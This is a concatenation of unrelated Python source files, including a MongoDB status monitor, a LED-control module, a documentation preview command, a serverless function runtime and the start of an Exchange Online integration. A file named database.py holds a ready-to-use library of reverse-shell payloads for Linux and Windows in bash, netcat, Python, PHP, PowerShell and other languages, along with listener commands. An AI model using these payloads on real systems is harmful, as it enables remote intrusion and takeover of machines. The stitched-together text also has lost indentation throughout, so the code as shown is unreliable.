network_bytesIn_persecond = int(serverStatus_2['network']['bytesIn']) - int(serverStatus['network']['bytesIn'])
network_bytesOut_persecond = int(serverStatus_2['network']['bytesOut']) - int(serverStatus['network']['bytesOut'])
network_numRequests_persecond = int(serverStatus_2['network']['numRequests']) - int(serverStatus['network']['numRequests'])
opcounters_insert_persecond = int(serverStatus_2['opcounters']['insert']) - int(serverStatus['opcounters']['insert'])
opcounters_query_persecond = int(serverStatus_2['opcounters']['query']) - int(serverStatus['opcounters']['query'])
opcounters_update_persecond = int(serverStatus_2['opcounters']['update']) - int(serverStatus['opcounters']['update'])
opcounters_delete_persecond = int(serverStatus_2['opcounters']['delete']) - int(serverStatus['opcounters']['delete'])
opcounters_command_persecond = int(serverStatus_2['opcounters']['command']) - int(serverStatus['opcounters']['command'])
#replset
try:
repl=serverStatus['repl']
setName=repl['setName']
replset=1
if repl['secondary']== True:
repl_role='secondary'
repl_role_new='s'
else:
repl_role='master'
repl_role_new='m'
except:
replset=0
repl_role='master'
repl_role_new='m'
pass
##################### insert data to mysql server#############################
sql = "insert into mongodb_status(server_id,host,port,tags,connect,replset,repl_role,ok,uptime,version,connections_current,connections_available,globalLock_currentQueue,globalLock_activeClients,mem_bits,mem_resident,mem_virtual,mem_supported,mem_mapped,mem_mappedWithJournal,network_bytesIn_persecond,network_bytesOut_persecond,network_numRequests_persecond,opcounters_insert_persecond,opcounters_query_persecond,opcounters_update_persecond,opcounters_delete_persecond,opcounters_command_persecond) values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s);"
param = (server_id,host,port,tags,connect,replset,repl_role,ok,uptime,version,connections_current,connections_available,globalLock_currentQueue,globalLock_activeClients,mem_bits,mem_resident,mem_virtual,mem_supported,mem_mapped,mem_mappedWithJournal,network_bytesIn_persecond,network_bytesOut_persecond,network_numRequests_persecond,opcounters_insert_persecond,opcounters_query_persecond,opcounters_update_persecond,opcounters_delete_persecond,opcounters_command_persecond)
func.mysql_exec(sql,param)
role='m'
func.update_db_status_init(repl_role_new,version,host,port,tags)
    except Exception as e:
logger_msg="check mongodb %s:%s : %s" %(host,port,e)
logger.warning(logger_msg)
try:
connect=0
sql="insert into mongodb_status(server_id,host,port,tags,connect) values(%s,%s,%s,%s,%s)"
param=(server_id,host,port,tags,connect)
func.mysql_exec(sql,param)
        except Exception as e:
logger.error(e)
sys.exit(1)
finally:
sys.exit(1)
finally:
func.check_db_status(server_id,host,port,tags,'mongodb')
sys.exit(1)
def main():
servers = func.mysql_query('select id,host,port,username,password,tags from db_servers_mongodb where is_delete=0 and monitor=1;')
logger.info("check mongodb controller started.")
if servers:
plist = []
for row in servers:
server_id=row[0]
host=row[1]
port=row[2]
username=row[3]
password=row[4]
tags=row[5]
p = Process(target = check_mongodb, args = (host,port,username,password,server_id,tags))
plist.append(p)
p.start()
for p in plist:
p.join()
else:
logger.warning("check mongodb: not found any servers")
logger.info("check mongodb controller finished.")
if __name__=='__main__':
main()
|
control.py
|
import collections, functools, sys, threading
from . extractor import Extractor
from .. project import construct, importer
from .. util.log_errors import LogErrors
from .. util import deprecated, flatten, log
from .. util.threads import runnable
from . routing import ActionList, Routing
class Control(runnable.Runnable):
DEFAULT = {'datatype': ActionList}
def __init__(self, routing=None, default=None, errors='raise',
python_path='bibliopixel.control', verbose=False,
pre_routing=None):
"""
        :param Address pre_routing: This Address is set with the message
after the message is received and converted, but before it is
routed.
:param errors: either a number, indicating how many errors to report
before ignoring them, or one of these strings:
'raise', meaning to raise an exception
'ignore', meaning to ignore all errors
'report', meaning to report all errors
"""
super().__init__()
self.verbose = verbose
self.receive = LogErrors(self._receive, errors)
default = dict(self.DEFAULT, **(default or {}))
self.pre_routing = ActionList(pre_routing)
self.routing = Routing(routing or {}, default or {}, python_path)
def set_project(self, project):
self.pre_routing.set_project(project)
self.routing.set_project(project)
def start(self):
super().start()
if self.verbose:
log.info('Starting %s', self)
self.thread = self._make_thread()
getattr(self.thread, 'start', lambda: None)()
def stop(self):
super().stop()
getattr(self.thread, 'stop', lambda: None)()
def _receive(self, msg):
"""
Receive a message from the input source and perhaps raise an Exception.
"""
msg = self._convert(msg)
if msg is None:
return
str_msg = self.verbose and self._msg_to_str(msg)
if self.verbose and log.is_debug():
log.debug('Message %s', str_msg)
if self.pre_routing:
self.pre_routing.receive(msg)
receiver, msg = self.routing.receive(msg)
if receiver:
receiver.receive(msg)
if self.verbose:
log.info('Routed message %s (%s) to %s', str_msg[:128], msg,
repr(receiver))
def _convert(self, msg):
"""
Convert the message to a Control-specific format
"""
raise NotImplementedError
def _make_thread(self):
"""
Returns a new thread to run the loop for this control source.
"""
pass
def _msg_to_str(self, msg):
if msg is None:
return '(None)'
return '.'.join(str(s) for s in msg.values()) or '.'
def __bool__(self):
return bool(self.routing or self.pre_routing)
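# Hedged sketch (not part of the original module): a minimal Control subclass only has
# to implement _convert, which turns a raw input into the message that gets routed;
# returning None drops the message.
class _PassthroughControl(Control):
    def _convert(self, msg):
        return msg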
class ControlLoop:
"""Mixin class for looping controls"""
def _receive_all_messages(self):
for msg in self.messages():
self.receive(msg)
if not self.running:
return
def messages(self):
"""Should yield a sequence of messages from the input source."""
raise NotImplementedError
def _make_thread(self):
return threading.Thread(target=self._receive_all_messages, daemon=True)
class ExtractedControl(Control):
EXTRACTOR = {}
def __init__(self, extractor=None, **kwds):
super().__init__(**kwds)
extractor = dict(self.EXTRACTOR, **(extractor or {}))
self.extractor = Extractor(**extractor)
def _convert(self, msg):
return self.extractor.extract(msg)
class ExtractedLoop(ExtractedControl, ControlLoop):
def _make_thread(self):
return ControlLoop._make_thread(self)
|
preview.py
|
# coding=utf-8
# Copyright 2021 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import shutil
import subprocess
import tempfile
import time
from pathlib import Path
from threading import Thread
from doc_builder import build_doc
from doc_builder.commands.build import check_node_is_available, locate_kit_folder
from doc_builder.commands.convert_doc_file import find_root_git
from doc_builder.utils import is_watchdog_available, read_doc_config
if is_watchdog_available():
from watchdog.events import FileSystemEventHandler
from watchdog.observers import Observer
class WatchEventHandler(FileSystemEventHandler):
"""
Utility class for building updated mdx files when a file change event is recorded.
"""
def __init__(self, args, source_files_mapping, kit_routes_folder):
super().__init__()
self.args = args
self.source_files_mapping = source_files_mapping
self.kit_routes_folder = kit_routes_folder
def on_created(self, event):
super().on_created(event)
is_valid, src_path, relative_path = self.transform_path(event)
if is_valid:
self.build(src_path, relative_path)
def on_modified(self, event):
super().on_modified(event)
is_valid, src_path, relative_path = self.transform_path(event)
if is_valid:
self.build(src_path, relative_path)
def transform_path(self, event):
"""
Check if a file is a doc file (mdx, or py file used as autodoc).
If so, returns mdx file path.
"""
src_path = event.src_path
parent_path_absolute = str(Path(self.args.path_to_docs).absolute())
relative_path = event.src_path[len(parent_path_absolute) + 1 :]
is_valid_file = False
if not event.is_directory:
if src_path.endswith(".py") and src_path in self.source_files_mapping:
src_path = self.source_files_mapping[src_path]
# if src_path.endswith(".md"):
# # src_path += "x"
# relative_path += "x"
if src_path.endswith(".mdx") or src_path.endswith(".md"):
is_valid_file = True
return is_valid_file, src_path, relative_path
return is_valid_file, src_path, relative_path
def build(self, src_path, relative_path):
"""
Build single mdx file in a temp dir.
"""
print(f"Building: {src_path}")
try:
            # build the single file in a temp dir, then copy the result into the kit routes folder
with tempfile.TemporaryDirectory() as tmp_input_dir:
# copy the file into tmp_input_dir
shutil.copy(src_path, tmp_input_dir)
with tempfile.TemporaryDirectory() as tmp_out_dir:
build_doc(
self.args.library_name,
tmp_input_dir,
tmp_out_dir,
version=self.args.version,
language=self.args.language,
is_python_module=not self.args.not_python_module,
watch_mode=True,
)
if str(src_path).endswith(".md"):
src_path += "x"
relative_path += "x"
src = Path(tmp_out_dir) / Path(src_path).name
dest = self.kit_routes_folder / relative_path
shutil.move(src, dest)
except Exception as e:
print(f"Error building: {src_path}\n{e}")
def start_watcher(path, event_handler):
"""
Starts `pywatchdog.observer` for listening changes in `path`.
"""
observer = Observer()
observer.schedule(event_handler, path, recursive=True)
observer.start()
print(f"\nWatching for changes in: {path}\n")
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
observer.join()
def start_sveltekit_dev(tmp_dir, env, args):
"""
Installs sveltekit node dependencies & starts sveltekit in dev mode in a temp dir.
"""
working_dir = str(tmp_dir / "kit")
print("Installing node dependencies")
subprocess.run(
["npm", "ci"],
stdout=subprocess.PIPE,
check=True,
encoding="utf-8",
cwd=working_dir,
)
# start sveltekit in dev mode
subprocess.run(
["npm", "run", "dev"],
check=True,
encoding="utf-8",
cwd=working_dir,
env=env,
)
def preview_command(args):
if not is_watchdog_available():
raise ImportError(
"Please install `watchdog` to run `doc-builder preview` command.\nYou can do so through pip: `pip install watchdog`"
)
read_doc_config(args.path_to_docs)
# Error at the beginning if node is not properly installed.
check_node_is_available()
# Error at the beginning if we can't locate the kit folder
kit_folder = locate_kit_folder()
if kit_folder is None:
raise EnvironmentError(
"Requires the kit subfolder of the doc-builder repo. We couldn't find it with "
"the doc-builder package installed, so you need to run the command from inside the doc-builder repo."
)
with tempfile.TemporaryDirectory() as tmp_dir:
output_path = Path(tmp_dir) / args.library_name / args.version / args.language
print("Initial build docs for", args.library_name, args.path_to_docs, output_path)
source_files_mapping = build_doc(
args.library_name,
args.path_to_docs,
output_path,
clean=True,
version=args.version,
language=args.language,
is_python_module=not args.not_python_module,
)
# convert the MDX files into HTML files.
tmp_dir = Path(tmp_dir)
# Copy everything in a tmp dir
shutil.copytree(kit_folder, tmp_dir / "kit")
# Manual copy and overwrite from output_path to tmp_dir / "kit" / "src" / "routes"
# We don't use shutil.copytree as tmp_dir / "kit" / "src" / "routes" exists and contains important files.
kit_routes_folder = tmp_dir / "kit" / "src" / "routes"
# files/folders cannot have a name that starts with `__` since it is a reserved Sveltekit keyword
for p in output_path.glob("**/*__*"):
if p.exists():
                p.rmdir() if p.is_dir() else p.unlink()
for f in output_path.iterdir():
dest = kit_routes_folder / f.name
if f.is_dir():
# Remove the dest folder if it exists
if dest.is_dir():
shutil.rmtree(dest)
shutil.copytree(f, dest)
else:
shutil.copy(f, dest)
# Node
env = os.environ.copy()
env["DOCS_LIBRARY"] = args.library_name
env["DOCS_VERSION"] = args.version
env["DOCS_LANGUAGE"] = args.language
Thread(target=start_sveltekit_dev, args=(tmp_dir, env, args)).start()
git_folder = find_root_git(args.path_to_docs)
event_handler = WatchEventHandler(args, source_files_mapping, kit_routes_folder)
start_watcher(git_folder, event_handler)
def preview_command_parser(subparsers=None):
if subparsers is not None:
parser = subparsers.add_parser("preview")
else:
parser = argparse.ArgumentParser("Doc Builder preview command")
parser.add_argument("library_name", type=str, help="Library name")
parser.add_argument(
"path_to_docs",
type=str,
help="Local path to library documentation. The library should be cloned, and the folder containing the "
"documentation files should be indicated here.",
)
parser.add_argument("--language", type=str, help="Language of the documentation to generate", default="en")
parser.add_argument("--version", type=str, help="Version of the documentation to generate", default="main")
parser.add_argument(
"--not_python_module",
action="store_true",
help="Whether docs files do NOT have correspoding python module (like HF course & hub docs).",
)
if subparsers is not None:
parser.set_defaults(func=preview_command)
return parser
|
database.py
|
class Shell(object):
def __init__(self: object) -> None:
self.listener: dict = {
'tcp': 'rlwrap nc -lvvnp {lport}',
'udp': 'rlwrap nc -u -lvvnp {lport}',
}
self.database: dict = {
'linux': {
'tcp': {
'awk': (
"""awk 'BEGIN LEFTBRACKETs = "/inet/tcp/0/{lhost}>/{lport}"; while(42) LEFTBRACKET doLEFTBRACKET printf "shell>" |& s; s |& getline c; if(c)LEFTBRACKET while ((c |& getline) > 0) print $0 |& s; close(c); RIGHTBRACKET RIGHTBRACKET while(c != "exit") close(s); RIGHTBRACKETRIGHTBRACKET' /dev/null""",
),
'bash': (
"""/bin/bash -i >& /dev/tcp/{lhost}/{lport} 0>&1""",
),
'go': (
"""echo 'package main;import"os/exec";import"net";func main()LEFTBRACKETc,_:=net.Dial("tcp","{lhost}:{lport}");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()RIGHTBRACKET' >| /tmp/.t.go && go run /tmp/.t.go && rm -f /tmp/.t.go""",
),
'java': (
"""r=Runtime.getRuntime();p=r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/{lhost}/{lport};cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]);p.waitFor()""",
),
'lua': (
"""lua -e "require('socket');require('os');t=socket.tcp();t:connect('{lhost}','{lport}');os.execute('/bin/sh -i <&3 >&3 2>&3');" """,
"""lua5.1 -e 'local host, port = "{lhost}", {lport} local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'""",
),
'netcat': (
"""rm -f /tmp/.g;mkfifo /tmp/.g;cat /tmp/.g|/bin/sh -i 2>&1|nc {lhost} {lport} &>/tmp/.g""",
"""nc -e /bin/sh {lhost} {lport}""",
"""ncat {lhost} {lport} -e /bin/sh""",
),
'nodejs': (
"""!function()LEFTBRACKETvar e=require("net"),n=require("child_process").spawn("/bin/sh",[]),i=new e.Socket;i.connect({lport},"{lhost}",function()LEFTBRACKETi.pipe(n.stdin),n.stdout.pipe(i),n.stderr.pipe(i)RIGHTBRACKET)RIGHTBRACKET();""",
"""require('child_process').exec('nc -e /bin/sh {lhost} {lport}')""",
),
'perl': (
"""perl -e 'use Socket;$i="{lhost}";$p={lport};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))LEFTBRACKETopen(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");RIGHTBRACKET;'""",
),
'php': (
"""php -r '$sock=fsockopen("{lhost}",{lport});$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'""",
"""php -r '$sock=fsockopen("{lhost}",{lport});exec("/bin/sh -i <&3 >&3 2>&3");'""",
"""php -r '$sock=fsockopen("{lhost}",{lport});shell_exec("/bin/sh -i <&3 >&3 2>&3");'""",
"""php -r '$sock=fsockopen("{lhost}",{lport});`/bin/sh -i <&3 >&3 2>&3`;'""",
"""php -r '$sock=fsockopen("{lhost}",{lport});system("/bin/sh -i <&3 >&3 2>&3");'""",
"""php -r '$sock=fsockopen("{lhost}",{lport});passthru("/bin/sh -i <&3 >&3 2>&3");'""",
"""php -r '$sock=fsockopen("{lhost}",{lport});popen("/bin/sh -i <&3 >&3 2>&3", "r");'""",
),
'python': (
"""python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{lhost}",{lport}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'""",
"""python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{lhost}",{lport}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/sh")'""",
"""python -c 'import sys,socket,os,pty;s=socket.socket();s.connect(("{lhost}",{lport}));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'""",
),
'ruby': (
"""ruby -rsocket -e 'f=TCPSocket.open("{lhost}",{lport}).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'""",
"""ruby -rsocket -e 'exit if fork;c=TCPSocket.new("{lhost}","{lport}");while(cmd=c.gets);IO.popen(cmd,"r")LEFTBRACKET|io|c.print io.readRIGHTBRACKETend'""",
),
'socat': (
"""wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat;/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:{lhost}:{lport}""",
),
'war': (
"""msfvenom -p java/jsp_shell_reverse_tcp LHOST={lhost} LPORT={lport} -f war > reverse.war""",
),
},
'udp': {
'bash': (
"""/bin/bash -i >& /dev/udp/{lhost}/{lport} 0>&1""",
),
'netcat': (
"""ncat --udp {lhost} {lport} -e /bin/sh""",
),
},
},
'windows': {
'tcp': {
'groovy': (
"""String host="{lhost}";int port={lport};String cmd="cmd.exe";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed())LEFTBRACKETwhile(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try LEFTBRACKETp.exitValue();break;RIGHTBRACKETcatch (Exception e)LEFTBRACKETRIGHTBRACKETRIGHTBRACKET;p.destroy();s.close();""",
),
'lua': (
"""lua5.1 -e 'local host, port = "{lhost}", {lport} local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'""",
),
'perl': (
"""perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"{lhost}:{lport}");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'""",
),
'powershell': (
"""powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("{lhost}",{lport});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%LEFTBRACKET0RIGHTBRACKET;while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)LEFTBRACKET;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()RIGHTBRACKET;$client.Close()""",
"""powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('{lhost}',{lport});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%LEFTBRACKET0RIGHTBRACKET;while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)LEFTBRACKET;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()RIGHTBRACKET;$client.Close()" """,
),
'python': (
"""C:\Python27\python.exe -c "(lambda __y,__g,__contextlib: [[[[[[[(s.connect(('{lhost}',{lport})),[[[(s2p_thread.start(),[[(p2s_thread.start(),(lambda __out: (lambda __ctx: [__ctx.__enter__(),__ctx.__exit__(None,None,None),__out[0](lambda: None)][2])(__contextlib.nested(type('except',(),LEFTBRACKET'__enter__': lambda self: None,'__exit__': lambda __self,__exctype,__value,__traceback: __exctype is not None and (issubclass(__exctype,KeyboardInterrupt) and [True for __out[0] in [((s.close(),lambda after: after())[1])]][0])RIGHTBRACKET)(),type('try',(),LEFTBRACKET'__enter__': lambda self: None,'__exit__': lambda __self,__exctype,__value,__traceback: [False for __out[0] in [((p.wait(),(lambda __after: __after()))[1])]][0]RIGHTBRACKET)())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s,args=[s,p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p,args=[s,p]))]][0] for __g['p'] in [(subprocess.Popen(['\\\\windows\\\\system32\\\\cmd.exe'], stdout=subprocess.PIPE,stderr=subprocess.STDOUT,stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])(LEFTBRACKETRIGHTBRACKET),'p2s')]][0] for __g['s2p'],s2p.__name__ in [(lambda s,p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data'])>0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'],__l['p'] in [(s,p)]][0])(LEFTBRACKETRIGHTBRACKET),'s2p')]][0] for __g['os'] in [(__import__('os',__g,__g))]][0] for __g['socket'] in [(__import__('socket',__g,__g))]][0] for __g['subprocess'] in [(__import__('subprocess',__g,__g))]][0] for __g['threading'] in [(__import__('threading',__g,__g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))),globals(),__import__('contextlib'))" """,
),
'ruby': (
"""ruby -rsocket -e 'c=TCPSocket.new("{lhost}","{lport}");while(cmd=c.gets);IO.popen(cmd,"r")LEFTBRACKET|io|c.print io.readRIGHTBRACKETend'""",
),
}
},
}
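# Hedged usage sketch: the templates above appear to keep literal braces spelled as
# LEFTBRACKET/RIGHTBRACKET so that str.format() only substitutes {lhost} and {lport}.
# A caller would render one payload roughly like this (host and port are examples):
def _render_payload_example(template, lhost="10.0.0.1", lport=4444):
    rendered = template.format(lhost=lhost, lport=lport)
    return rendered.replace("LEFTBRACKET", "{").replace("RIGHTBRACKET", "}")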
|
kubeless.py
|
#!/usr/bin/env python
import os
import imp
import json
import logging
import datetime
from multiprocessing import Process, Queue
import bottle
import prometheus_client as prom
try:
import queue
except:
import Queue as queue
mod = imp.load_source('function',
'/kubeless/%s.py' % os.getenv('MOD_NAME'))
func = getattr(mod, os.getenv('FUNC_HANDLER'))
func_port = os.getenv('FUNC_PORT', 8080)
timeout = float(os.getenv('FUNC_TIMEOUT', 180))
memfile_max = int(os.getenv('FUNC_MEMFILE_MAX', 100*1024*1024))
bottle.BaseRequest.MEMFILE_MAX = memfile_max
app = application = bottle.app()
func_hist = prom.Histogram('function_duration_seconds',
'Duration of user function in seconds',
['method'])
func_calls = prom.Counter('function_calls_total',
'Number of calls to user function',
['method'])
func_errors = prom.Counter('function_failures_total',
'Number of exceptions in user function',
['method'])
function_context = {
'function-name': func,
'timeout': timeout,
'runtime': os.getenv('FUNC_RUNTIME'),
'memory-limit': os.getenv('FUNC_MEMORY_LIMIT'),
}
def funcWrap(q, event, c):
try:
q.put(func(event, c))
except Exception as inst:
q.put(inst)
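# Hedged sketch of the user-side contract assumed above: the module named by MOD_NAME
# must expose FUNC_HANDLER with the signature func(event, context). For example:
def _example_user_function(event, context):
    return {"echo": event["data"], "runtime": context["runtime"]}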
@app.get('/healthz')
def healthz():
return 'OK'
@app.get('/metrics')
def metrics():
bottle.response.content_type = prom.CONTENT_TYPE_LATEST
return prom.generate_latest(prom.REGISTRY)
@app.route('/<:re:.*>', method=['GET', 'POST', 'PATCH', 'DELETE'])
def handler():
req = bottle.request
content_type = req.get_header('content-type')
data = req.body.read()
if content_type == 'application/json':
data = req.json
event = {
'data': data,
'event-id': req.get_header('event-id'),
'event-type': req.get_header('event-type'),
'event-time': req.get_header('event-time'),
'event-namespace': req.get_header('event-namespace'),
'extensions': {
'request': req
}
}
method = req.method
func_calls.labels(method).inc()
with func_errors.labels(method).count_exceptions():
with func_hist.labels(method).time():
q = Queue()
p = Process(target=funcWrap, args=(q, event, function_context))
p.start()
try:
res = q.get(block=True, timeout=timeout)
except queue.Empty:
p.terminate()
p.join()
return bottle.HTTPError(408, "Timeout while processing the function")
else:
p.join()
if isinstance(res, Exception) and not isinstance(res, bottle.HTTPResponse):
logging.error("Function returned an exception: %s", res)
raise res
return res
if __name__ == '__main__':
import sys
import requestlogger
loggedapp = requestlogger.WSGILogger(
app,
[logging.StreamHandler(stream=sys.stdout)],
requestlogger.ApacheFormatter())
bottle.run(loggedapp, server='cherrypy', host='0.0.0.0', port=func_port)
|
EWSO365.py
|
import random
import string
from typing import Dict
import dateparser
import chardet
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
import sys
import traceback
import json
import os
import hashlib
from io import StringIO
import logging
import warnings
import email
from requests.exceptions import ConnectionError
from collections import deque
from multiprocessing import Process
import exchangelib
from exchangelib.errors import (
ErrorItemNotFound,
ResponseMessageError,
RateLimitError,
ErrorInvalidIdMalformed,
ErrorFolderNotFound,
ErrorMailboxStoreUnavailable,
ErrorMailboxMoveInProgress,
ErrorNameResolutionNoResults,
MalformedResponseError,
)
from exchangelib.items import Item, Message, Contact
from exchangelib.services.common import EWSService, EWSAccountService
from exchangelib.util import create_element, add_xml_child, MNS, TNS
from exchangelib import (
IMPERSONATION,
Account,
EWSDateTime,
EWSTimeZone,
Configuration,
FileAttachment,
Version,
Folder,
HTMLBody,
Body,
ItemAttachment,
OAUTH2,
OAuth2AuthorizationCodeCredentials,
Identity,
ExtendedProperty
)
from oauthlib.oauth2 import OAuth2Token
from exchangelib.version import EXCHANGE_O365
from exchangelib.protocol import BaseProtocol, NoVerifyHTTPAdapter
# Ignore warnings print to stdout
warnings.filterwarnings("ignore")
""" Constants """
APP_NAME = "ms-ews-o365"
FOLDER_ID_LEN = 120
MAX_INCIDENTS_PER_FETCH = 50
FETCH_TIME = demisto.params().get('fetch_time') or '10 minutes'
# move results
MOVED_TO_MAILBOX = "movedToMailbox"
MOVED_TO_FOLDER = "movedToFolder"
# item types
FILE_ATTACHMENT_TYPE = "FileAttachment"
ITEM_ATTACHMENT_TYPE = "ItemAttachment"
ATTACHMENT_TYPE = "attachmentType"
TOIS_PATH = "/root/Top of Information Store/"
# context keys
ATTACHMENT_ID = "attachmentId"
ATTACHMENT_ORIGINAL_ITEM_ID = "originalItemId"
NEW_ITEM_ID = "newItemId"
MESSAGE_ID = "messageId"
ITEM_ID = "itemId"
ACTION = "action"
MAILBOX = "mailbox"
MAILBOX_ID = "mailboxId"
FOLDER_ID = "id"
TARGET_MAILBOX = 'receivedBy'
# context paths
CONTEXT_UPDATE_EWS_ITEM = f"EWS.Items((val.{ITEM_ID} === obj.{ITEM_ID} || " \
f"(val.{MESSAGE_ID} && obj.{MESSAGE_ID} && val.{MESSAGE_ID} === obj.{MESSAGE_ID}))" \
f" && val.{TARGET_MAILBOX} === obj.{TARGET_MAILBOX})"
CONTEXT_UPDATE_EWS_ITEM_FOR_ATTACHMENT = "EWS.Items(val.{0} == obj.{1})".format(
ITEM_ID, ATTACHMENT_ORIGINAL_ITEM_ID
)
CONTEXT_UPDATE_ITEM_ATTACHMENT = ".ItemAttachments(val.{0} == obj.{0})".format(
ATTACHMENT_ID
)
CONTEXT_UPDATE_FILE_ATTACHMENT = ".FileAttachments(val.{0} == obj.{0})".format(
ATTACHMENT_ID
)
CONTEXT_UPDATE_FOLDER = "EWS.Folders(val.{0} == obj.{0})".format(FOLDER_ID)
# fetch params
LAST_RUN_TIME = "lastRunTime"
LAST_RUN_IDS = "ids"
LAST_RUN_FOLDER = "folderName"
ERROR_COUNTER = "errorCounter"
# headers
ITEMS_RESULTS_HEADERS = [
"sender",
"subject",
"hasAttachments",
"datetimeReceived",
"receivedBy",
"author",
"toRecipients",
"textBody",
]
UTF_8 = 'utf-8'
""" Classes """
class ProxyAdapter(requests.adapters.HTTPAdapter):
"""
Proxy Adapter used to add PROXY to requests
"""
def send(self, *args, **kwargs):
kwargs['proxies'] = handle_proxy()
return super().send(*args, **kwargs)
class InsecureProxyAdapter(NoVerifyHTTPAdapter):
"""
Insecure Proxy Adapter used to add PROXY and INSECURE to requests
NoVerifyHTTPAdapter is a built-in insecure HTTPAdapter class
"""
def send(self, *args, **kwargs):
kwargs['proxies'] = handle_proxy()
return super().send(*args, **kwargs)
class EWSClient:
def __init__(
self,
default_target_mailbox,
client_id,
client_secret,
tenant_id,
folder="Inbox",
is_public_folder=False,
request_timeout="120",
max_fetch=MAX_INCIDENTS_PER_FETCH,
self_deployed=True,
insecure=True,
proxy=False,
**kwargs,
):
"""
Client used to communicate with EWS
:param default_target_mailbox: Email address from which to fetch incidents
:param client_id: Application client ID
:param client_secret: Application client secret
:param folder: Name of the folder from which to fetch incidents
:param is_public_folder: Public Folder flag
:param request_timeout: Timeout (in seconds) for HTTP requests to Exchange Server
:param max_fetch: Max incidents per fetch
:param insecure: Trust any certificate (not secure)
"""
BaseProtocol.TIMEOUT = int(request_timeout)
self.ews_server = "https://outlook.office365.com/EWS/Exchange.asmx/"
self.ms_client = MicrosoftClient(
tenant_id=tenant_id,
auth_id=client_id,
enc_key=client_secret,
app_name=APP_NAME,
base_url=self.ews_server,
verify=not insecure,
proxy=proxy,
self_deployed=self_deployed,
scope="https://outlook.office.com/.default",
)
self.folder_name = folder
self.is_public_folder = is_public_folder
self.access_type = kwargs.get('access_type') or IMPERSONATION
self.max_fetch = min(MAX_INCIDENTS_PER_FETCH, int(max_fetch))
self.last_run_ids_queue_size = 500
self.client_id = client_id
self.client_secret = client_secret
self.account_email = default_target_mailbox
self.config = self.__prepare(insecure)
